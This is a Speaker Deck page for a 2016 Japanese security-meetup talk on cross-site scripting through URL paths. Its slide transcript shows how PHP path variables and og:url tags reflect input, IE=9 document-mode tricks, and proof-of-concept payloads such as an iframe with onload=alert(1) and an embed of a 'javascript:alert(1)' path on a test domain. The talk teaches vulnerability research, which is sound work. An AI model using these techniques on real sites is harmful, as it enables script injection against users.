Upgrade to Pro — share decks privately, control downloads, hide ads and more …

明日から使える?! PATHでXSSする技術/ Shibuya.XSS techtalk #7

Avatar for Masato Kinugawa Masato Kinugawa
March 29, 2016
Technology
14
28k

明日から使える?! PATHでXSSする技術/ Shibuya.XSS techtalk #7

Shibuya.XSS techtalk #7 の資料です。

Avatar for Masato Kinugawa

Masato Kinugawa

March 29, 2016
Tweet

More Decks by Masato Kinugawa

See All by Masato Kinugawa
Shadow DOMとセキュリティ - 光と影の境界を探る / Shibuya.XSS techtalk #13
Avatar for Masato Kinugawa masatokinugawa
0
510
Shadow DOM & Security - Exploring the boundary between light and shadow
Avatar for Masato Kinugawa masatokinugawa
1
1.6k
ブラウザのレガシー・独自機能を愛でる-Firefoxの脆弱性4選- / Browser Crash Club #1
Avatar for Masato Kinugawa masatokinugawa
1
860
注目したいクライアントサイドの脆弱性2選/ Security.Tokyo #3
Avatar for Masato Kinugawa masatokinugawa
8
4k
バグハンティングのすゝめ / P3NFEST
Avatar for Masato Kinugawa masatokinugawa
5
2.5k
Pwn2OwnでMicrosoft Teamsをハッキングして2000万円を獲得した方法/ Shibuya.XSS techtalk #12
Avatar for Masato Kinugawa masatokinugawa
13
20k
How I Hacked Microsoft Teams and got $150,000 in Pwn2Own
Avatar for Masato Kinugawa masatokinugawa
1
22k
JSでDoSる/ Shibuya.XSS techtalk #11
Avatar for Masato Kinugawa masatokinugawa
20
7k
Electron: Abusing the lack of context isolation - CureCon(en)
Avatar for Masato Kinugawa masatokinugawa
5
100k

Other Decks in Technology

See All in Technology
社内お問い合わせBotの仕組みと学び
Avatar for Tomoyuki Nishimura nish01
0
300
How to achieve interoperable digital identity across Asian countries
Avatar for Naohiro Fujie fujie
0
120
定期的な価値提供だけじゃない、スクラムが導くチームの共創化 / 20251004 Naoki Takahashi
Avatar for SHIFT EVOLVE shift_evolve
PRO
3
300
GC25 Recap+: Advancing Go Garbage Collection with Green Tea
Avatar for Takuto Nagami logica0419
1
400
OCI Network Firewall 概要
Avatar for oracle4engineer oracle4engineer
PRO
1
7.8k
職種別ミートアップで社内から盛り上げる アウトプット文化の醸成と関係強化/ #DevRelKaigi
Avatar for Ichiro Nishiuma nishiuma
2
130
データエンジニアがこの先生きのこるには...?
Avatar for 10xinc 10xinc
0
440
AIが書いたコードをAIが検証する!自律的なモバイルアプリ開発の実現
Avatar for henteko henteko
1
340
関係性が駆動するアジャイル──GPTに人格を与えたら、対話を通してふりかえりを 習慣化できた話
Avatar for リリカル mhlyc
0
130
BirdCLEF+2025 Noir 5位解法紹介
Avatar for MYSO myso
0
190
Goに育てられ開発者向けセキュリティ事業を立ち上げた僕が今向き合う、AI × セキュリティの最前線 / Go Conference 2025
Avatar for GMO Flatt Security flatt_security
0
350
GA technologiesでのAI-Readyの取り組み@DataOps Night
Avatar for yuto16 yuto16
0
270

Featured

See All Featured
Keith and Marios Guide to Fast Websites
Avatar for Keith Pitt keithpitt
411
22k
Distributed Sagas: A Protocol for Coordinating Microservices
Avatar for Caitie McCaffrey caitiem20
333
22k
Raft: Consensus for Rubyists
Avatar for Patrick Van Stee vanstee
139
7.1k
How GitHub (no longer) Works
Avatar for Zach Holman holman
315
140k
Building a Scalable Design System with Sketch
Avatar for Laura Van Doore lauravandoore
462
33k
KATA
Avatar for Megan Lloyd mclloyd
32
15k
How to Think Like a Performance Engineer
Avatar for Harry Roberts csswizardry
27
2k
Imperfection Machines: The Place of Print at Facebook
Avatar for Scott Boms scottboms
269
13k
Sharpening the Axe: The Primacy of Toolmaking
Avatar for Bryan Cantrill bcantrill
45
2.5k
Refactoring Trust on Your Teams (GOTO; Chicago 2020)
Avatar for Rebecca Miller-Webster rmw
35
3.2k
個人開発の失敗を避けるイケてる考え方 / tips for indie hackers
Avatar for panda_program panda_program
114
20k
10 Git Anti Patterns You Should be Aware of
Avatar for Lemi Orhan Ergin lemiorhan
PRO
657
61k

Transcript

  1. None
  2. None
  3. None
  4. None
  5. None

  6. https://host/tags/aaa/ ... </head> <body> <form> <input type="text" value="aaa"> ...

  7. ... </head> <meta property="og:url" content="https://host/path/index"> <body> ... https://host/path/index?p=1

  8. ... </head> <meta property="og:url" content="https://host/path/index;aaa"> <body> ... https://host/path/index;aaa?p=1

  9. None

  10. http://php.net/index.php http://php.net/index.php/xxx/yyy/zzz

  11. http://shibuyaxss.connpass.com/event/28232/ http://shibuyaxss.connpass.com/event/28232/;abc

  12. None

  13. SCRIPT_URL /test.php/<b>PATH</b> SCRIPT_URI http://localhost/test.php/<b>PATH</b> PATH_INFO /<b>PATH</b> PATH_TRANSLATED \<b>PATH<\b> PHP_SELF /test.php/<b>PATH</b>

  14. GET /path?query HTTP/1.1 http://php.net/manual/ja/reserved.variables.server.php

  15. /test.php/<b>PATH</b>?<b>QUERY</b> GET /test.php/%3Cb%3EPATH%3C/b%3E?%3Cb%3EQUERY% 3C/b%3E HTTP/1.1 QUERY_STRING %3Cb%3EQUERY%3C/b%3E REQUEST_URI /test.php/%3Cb%3EPATH%3C/b%3E? %3Cb%3EQUERY%3C/b%3E

    http://localhost/test.php/<b>PATH</b>?<b>QUERY</b>

  16. /test.php/%3Cb%3EPATH%3C/b%3E?<b>QUERY</b> GET /test.php/%3Cb%3EPATH%3C/b%3E?<b>QUERY</b> HTTP/1.1 QUERY_STRING <b>QUERY</b> REQUEST_URI /test.php/%3Cb%3EPATH%3C/b%3E?<b>QUERY</b> http://localhost/test.php/<b>PATH</b>?<b>QUERY</b>

  17. http://localhost/test.php/<b>PATH</b> GET /test.php/<b>PATH</b> HTTP/1.1

  18. /test.php/%3Cb%3EPATH%3C/b%3E GET /test.php/<b>PATH</b> HTTP/1.1 REQUEST_URI /test.php/<b>PATH</b> location.pathname /test.php/%3Cb%3EPATH%3C/b%3E http://localhost/test.php/<b>PATH</b>

  19. None
  20. None
  21. None
  22. None
  23. None
  24. None
  25. None
  26. None
  27. None
  28. None
  29. None
  30. None
  31. None
  32. None
  33. None

  34. HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 X-UA-Compatible: IE=9 <head> <meta

    http-equiv="X-UA-Compatible" content="IE=9"> </head>

  35. <svg> <circle cx="100" cy="100" r="50" fill="red"/> </svg>

  36. ifr=document.createElement('<iframe onload=alert(1)>'); document.body.appendChild(ifr); InvalidCharacterError

  37. <meta http-equiv="X-UA-Compatible" content="IE=9"> <script> console.log(document.documentMode) /* 9 */ </script> <iframe

    src=//victim/></iframe> http://blogs.msdn.com/cfs-filesystemfile.ashx/__key/communityserver-blogs-components- weblogfiles/00-00-01-35-07/3073.IE_5F00_chart_5F00_jp.pdf

  38. <meta http-equiv="X-UA-Compatible" content="IE=9"> <embed src="http://shibuya.vulnerabledoma.in/javascript:alert(1)/% 2F..%2F..%2Fjizen2#hash"></embed>

  39. <script src="//ajax.googleapis.com/ajax/libs/jquerymobile/1.4.5/jquery.mobile.min.js"> </script>

  40. None
  41. None
  42. None
  43. None
  44. None
  45. None
  46. None
  47. None
  48. None
  49. None
  50. None
  51. None
  52. None